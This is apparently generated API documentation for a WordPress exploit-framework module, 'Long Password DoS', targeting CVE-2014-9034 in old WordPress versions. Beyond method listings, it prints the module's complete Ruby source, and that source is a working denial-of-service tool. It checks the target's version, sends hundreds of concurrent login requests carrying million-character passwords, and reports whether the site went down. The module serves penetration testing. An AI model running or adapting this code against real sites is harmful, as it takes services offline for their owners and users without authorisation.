Class: Wpxf::Auxiliary::LongPasswordDos
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login, WordPress::User
- Defined in:
- lib/wpxf/modules/auxiliary/dos/long_password_dos.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ LongPasswordDos
constructor
A new instance of LongPasswordDos.
- #max_requests ⇒ Object
- #pass_length ⇒ Object
- #run ⇒ Object
- #should_validate_user? ⇒ Boolean
- #username ⇒ Object
Methods included from WordPress::User
#wordpress_user_exists?, #wordpress_user_profile_form_fields
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ LongPasswordDos
Returns a new instance of LongPasswordDos.
9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 9 def initialize super update_info( name: 'Long Password DoS', desc: 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, '\ 'and 4.x before 4.0.1 allows remote attackers to cause a denial '\ 'of service via a long password that is improperly handled during '\ 'hashing.', author: [ 'Javier Nieto Arevalo', # Vulnerability disclosure 'Andres Rojas Guerrero', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2014-9034'], ['WPVDB', '7681'], ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034'] ], date: 'Nov 20 2014' ) ([ IntegerOption.new( name: 'pass_length', required: true, desc: 'Length of the password to use', default: 1_000_000 ), IntegerOption.new( name: 'max_requests', required: true, desc: 'Max number of requests to send', default: 200 ), IntegerOption.new( name: 'http_client_timeout', desc: 'Max wait time in seconds for HTTP responses', default: 5, required: true ), StringOption.new( name: 'username', desc: 'The username to attempt to login with', required: true, default: '' ), BooleanOption.new( name: 'validate_user', desc: 'Validate the specified username', required: true, default: true ) ]) end |
Instance Method Details
#check ⇒ Object
81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 81 def check target_version = wordpress_version vuln_ranges = [ [Gem::Version.new('0'), Gem::Version.new('3.7.5')], [Gem::Version.new('3.8'), Gem::Version.new('3.8.5')], [Gem::Version.new('3.9'), Gem::Version.new('3.9.3')], [Gem::Version.new('4.0'), Gem::Version.new('4.0.1')] ] return :unknown if target_version.nil? vuln_ranges.each do |range| if target_version >= range[0] && target_version < range[1] return :vulnerable end end :safe end |
#max_requests ⇒ Object
73 74 75 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 73 def max_requests normalized_option_value('max_requests') end |
#pass_length ⇒ Object
77 78 79 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 77 def pass_length normalized_option_value('pass_length') end |
#run ⇒ Object
101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 101 def run return false unless super if should_validate_user? emit_info "Checking if user \"#{username}\" exists..." unless wordpress_user_exists?(username) emit_error 'The specified user does not exist, aborting operation.' return end end emit_info "Generating payload..." pass = Wpxf::Utility::Text.rand_alpha(pass_length) opts = { url: wordpress_url_login, method: :post, body: wordpress_login_post_body(username, pass) } emit_info "Preparing #{max_requests} requests..." complete_requests = 0 max_requests.times do queue_request(opts) do |res| complete_requests += 1 emit_warning("#{complete_requests} requests executed") if complete_requests % 10 == 0 end end emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads" execute_queued_requests emit_success 'Finished executing requests' if wordpress_and_online? emit_error "FAILED: #{full_uri} appears to still be online" return false else emit_success "#{full_uri} appears to be down" return true end end |
#should_validate_user? ⇒ Boolean
65 66 67 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 65 def should_validate_user? normalized_option_value('validate_user') end |
#username ⇒ Object
69 70 71 |
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 69 def username normalized_option_value('username') end |